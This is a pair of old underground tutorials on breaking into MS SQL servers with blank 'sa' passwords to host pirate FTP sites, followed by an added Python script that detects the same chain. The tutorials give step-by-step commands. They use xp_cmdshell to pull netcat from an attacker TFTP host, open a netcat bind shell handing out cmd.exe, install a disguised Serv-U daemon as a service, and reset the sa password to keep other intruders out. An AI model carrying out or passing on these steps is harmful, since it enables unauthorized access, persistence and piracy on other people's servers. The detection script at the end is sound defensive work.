[SQL] hacking Tips for advanced users

To follow this tutorial you have to:

1-Be familiar with exploiting an SQL server and writing files on it with the ECHO command. If you don't know how to do that well, forget about the rest.
2-Know the basic MSDOS commands and how BATCH files work.
(3-Good knowledge of the MSSQL server's built-in stored procedures also helps a lot.)
FIRST TIP - MAKING YOUR SERVER SAFE BY CHANGING THE DEFAULT "SA" PASSWORD
This one is quite easy and saves you from watching your fast stro get rehacked by the next person who finds the blank "sa" password.
1-Connect to the SQL server using SQLEXEC (once again, remember that you have to know how to exploit an SQL server by yourself.. I'm not going to teach you that).
2-Use the ECHO command to create a file with any name and the extension .BAT, containing the following lines:
@osql -U sa -P -Q "sp_password NULL , newpassword , sa"
@exit
*Syntax:
- OSQL: the command-line query tool that ships with SQL Server; it connects to a database and runs what you pass it. How "powerful" it is beyond that I can't say, because I don't know much about SQL servers. (For more info just type OSQL -? on SQLEXEC and it prints its options.)
- -U sa: -U stands for USERNAME; sa is obviously the login you're using to connect to the current database.
- -P : -P stands for password, and nothing after it (just the blank space) is the current NULL password of the SA account.
- -Q "sp_password NULL , newpassword , sa": this executes the stored procedure that lets you change the password of a login on the database. NULL is the current password (don't leave a blank space.. type just NULL), newpassword is the password you want to use, and sa is the login whose password you are changing. Because newpassword is passed without quotes, SQL Server has to read it as an identifier: it must not start with a digit and must not contain spaces. Make it longer than 6 characters. eg. BAD: 2002imadethis GOOD: imadethis2002. (If you really want a leading digit or spaces, put the password in single quotes: 'my pass 2002'.)
- @exit: closes the window as soon as the operation finishes.
3-After the file has been created on the server, execute it by typing the command C:\PATH\FILENAME.BAT on SQLEXEC. If everything went fine the output will be "Password changed." and the password for the SA account is now the one you chose. And there you go, it's safe against rehackers but not against the admin.. keep that in mind.
-----------------------------------------
SECOND TIP - MAKING SERV-U START AS A DEFAULT SYSTEM SERVICE
This is what keeps you from having to log in and restart the Serv-U daemon every time the system restarts.
I've read the Serv-U help files, and some of the commands here ONLY work on Windows NT and Windows 2000 and with Serv-U 3 or higher. I've not tested them on Windows XP. This will NOT work on Win95/98/ME. I haven't tested it on Serv-U 2.5 or older, so try that on your own.
1-Upload the needed files, Servudaemon.exe (you can rename this file to whatever you want) and Servudaemon.ini (as you are an experienced SQL hacker you already know how to do this). ATTENTION: DON'T execute the Servudaemon.exe file yet or else the service install won't work right.
2-Type this command on SQLEXEC: C:\PATH\OF\FILES\Servudaemon.exe /i. The Serv-U documentation describes "/i" as "install server as a system service (NT only)". Basically what it does is add a group of registry keys to the Windows registry so that the daemon starts every time the system restarts. There is no output from this command, so wait a couple of seconds and it's done.
3-Now type the following command on SQLEXEC: NET START Serv-U. If everything went as predicted the output will be "The Serv-U FTP Server service was started successfully." and it's all done. NOW Serv-U is up and running and you don't have to worry about restarts.
*Sometimes the output of NET START Serv-U is "The requested service has already been started." This has two possible meanings. One: it's your server and you already started it. Two: it's already hacked, and what I'm about to explain you do on your own.. you SHOULD RESPECT others' "work" though.
3.1-Type the command NET STOP Serv-U; the output will be "The Serv-U FTP Server service was stopped successfully." and you're done, the server is down. Now go back and execute what I described in step 2 and step 3 to run your own Serv-U there.
________________________________________________________________________________
[SQL] Hacking tut........
WARNING: This document/tutorial is to be kept private!
**** Creating a pubstro using mssql bugs v1.1 ****
This tutorial assumes you have the following skills:
- Download/unzip/install files
- Know Windows/DOS commands
- Know how to scan IP ranges for a certain port
- Know how to register a program with a keygen
- Know how to set up an FTP server using Serv-U
1. Scan your favorite range with your favorite scanner on port 1433 (I recommend SuperScan)
In my progs pack OR @ http://packetstormsecurity.nl/NT/scanners/superscan.exe
Save the results.
2. Install the Serv-U FTP server (www.serv-u.com)
In my progs pack OR get the keygen @ http://astalavista.box.sk and register it.
Add some users the way you like your pubstro to be, and change the settings and the rest to taste.
3. On a machine (your own, maybe?) start a TFTP server (spelled correctly: TFTP, not FTP).
On most Linux boxes there is a tftp server already (try to figure out how to set it up correctly).
Once the server is running, copy the two files from Serv-U (WINMGNT.exe and servudaemon.ini) to the tftp server dir.
Download netcat.
In my progs pack OR @ http://www.atstake.com/research/tools/nc11nt.zip
- extract nc.exe and copy it to your tftp server dir
Download SQLexec with the graphical user interface
In my progs pack OR @ http://www.peckerland.com/software/sqlexec.zip
Unzip sqlexec.zip and start sqlexec.exe
- in the host field, fill in an IP that has port 1433 open.
- Press connect.
- If the connect button gets greyed out you have a vulnerable server (the sa login accepted the blank password). Otherwise it will say "Unable to connect", and you try the next IP until one connects.
- If connected: go to the CMD field
- enter: tftp -i 128.233.42.47 get nc.exe
  (128.233.42.47 stands for your own tftp server; -i selects binary mode, which you need for an .exe)
- The client will probably freeze, but hell, it works..
- start another instance of sqlexec
- reconnect as before..
- enter: nc.exe -L -p 1111 -d -e cmd.exe
  (-L listens and keeps listening after a client disconnects, -p 1111 is the port, -d detaches from the console, -e cmd.exe hands a command prompt to whoever connects)
Now use telnet, RTC, PuTTY or something else:
Start->Run ---> telnet IP_FROM_SERVER 1111
You will now see the Windows command line, which is easier to work with than sqlexec alone.
Now enter the following commands:
Type "dir" and press enter (5x !!)
You will get a directory listing and know for sure that it works.
Then:
tftp -i 128.233.42.47 get servudaemon.ini
tftp -i 128.233.42.47 get WINMGNT.exe
-- go back to sqlexec.
Reconnect..
CMD to execute: WINMGNT.exe (hidden)
The FTP server should be working now, if you made the right directory structure!!
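Seen from the other side, this is what the chain in both tutorials above looks like to whoever is watching the SQL Server box. The following Python is an added example, not code from either tutorial or from any of the tools they use: it runs the command-line indicators that appear in the steps (tftp -i ... get, nc.exe ... -e cmd.exe, ServUDaemon.exe / WINMGNT.exe, NET START/STOP Serv-U, osql -U sa -P with no password, sp_password) over a constructed list of process-creation events of the kind a Sysmon or EDR sensor records as (parent image, command line), and flags every child of sqlservr.exe as xp_cmdshell use whatever it was asked to run. The event list, the reuse of the tutorial's 128.233.42.47 as the tftp host, the rule names and the Finding type are all assumptions made for this example.

```python
"""Detection rules for the MSSQL -> xp_cmdshell -> tftp/netcat/Serv-U chain.

Added example, not part of the original tutorials. Input is a list of
(parent_image, command_line) pairs as a process-creation sensor would
record them on the SQL Server host.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple


@dataclass(frozen=True)
class Finding:
    rule: str
    parent: str
    command: str


# Command-line indicators taken from the steps above. osql switches are
# case-sensitive (-P is password, -p is packet size), so that rule relaxes
# case only on the program name and the "sa" login.
RULES = [
    # tftp -i <host> get <file>: binary-mode download of a tool onto the box
    ("tftp_download",
     re.compile(r"\btftp(?:\.exe)?\s+(?:-i\s+)?\S+\s+get\s+\S+", re.I)),
    # nc[.exe] ... -e cmd.exe: netcat handing a command prompt to a socket
    ("netcat_cmd_shell",
     re.compile(r"\bnc(?:\.exe)?\b.*\s-e\s+cmd(?:\.exe)?\b", re.I)),
    # ServUDaemon.exe or WINMGNT.exe: the FTP daemon under its usual or renamed name
    ("servu_daemon",
     re.compile(r"\b(?:servudaemon|winmgnt)(?:\.exe)?\b", re.I)),
    # net start|stop Serv-U: the service being controlled from a shell
    ("servu_service_control",
     re.compile(r"\bnet\s+(?:start|stop)\s+serv-u\b", re.I)),
    # osql -U sa -P followed by another switch or nothing: blank sa password
    ("osql_blank_sa_login",
     re.compile(r"(?i:\bosql(?:\.exe)?\b).*\s-U\s*(?i:sa)\b.*\s-P"
                r"(?:\s+(?:\"\"|''))?(?=\s+-|\s*$)")),
    # sp_password on a command line: the sa password being (re)set
    ("sa_password_change", re.compile(r"\bsp_password\b", re.I)),
]


def scan_event(parent: str, command: str) -> List[Finding]:
    """Return the findings for one process-creation event, in rule order."""
    findings: List[Finding] = []
    # Any process spawned by the SQL Server service is xp_cmdshell at work,
    # no matter what it ran; SQLEXEC-style tools leave no other trace.
    if parent.lower() == "sqlservr.exe":
        findings.append(Finding("xp_cmdshell_child", parent, command))
    for name, pattern in RULES:
        if pattern.search(command):
            findings.append(Finding(name, parent, command))
    return findings


def scan_events(events: Iterable[Tuple[str, str]]) -> List[Finding]:
    return [f for parent, cmd in events for f in scan_event(parent, cmd)]


def summarize(events: Iterable[Tuple[str, str]]) -> Dict[str, int]:
    """Count findings per rule over a batch of events."""
    counts: Dict[str, int] = {}
    for f in scan_events(events):
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


# Constructed sample: the tutorial's chain as a sensor would log it, plus
# two benign events (an admin using osql with a real password, and svchost).
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    ("sqlservr.exe", "cmd.exe /c tftp -i 128.233.42.47 get nc.exe"),
    ("sqlservr.exe", "cmd.exe /c nc.exe -L -p 1111 -d -e cmd.exe"),
    ("cmd.exe", "tftp -i 128.233.42.47 get WINMGNT.exe"),
    ("sqlservr.exe", r"cmd.exe /c C:\Temp\ServUDaemon.exe /i"),
    ("sqlservr.exe", "cmd.exe /c net start Serv-U"),
    ("cmd.exe", 'osql -U sa -P -Q "sp_password NULL , newpassword , sa"'),
    ("explorer.exe", 'osql -U sa -P S3cret -Q "select @@version"'),
    ("services.exe", "svchost.exe -k netsvcs"),
]


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f.rule:22} parent={f.parent:13} {f.command}")
    print(summarize(SAMPLE_EVENTS))
```

Running it prints one line per finding. The check that matters most for a defender is the parent one: SQLEXEC itself leaves nothing in the command text, so "sqlservr.exe spawned cmd.exe" is the alert, while the tool-specific rules only catch this exact chain and are defeated by renaming, as the Serv-U tip itself points out.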
Good luck! (remake by FDF, "the key to your success")
IN VERSION 1.2:
- Full of SCREENSHOTS
- All programs INCLUDED!
- Other ways to do it!
And remember to keep it secret m8s, this is only for 1337.
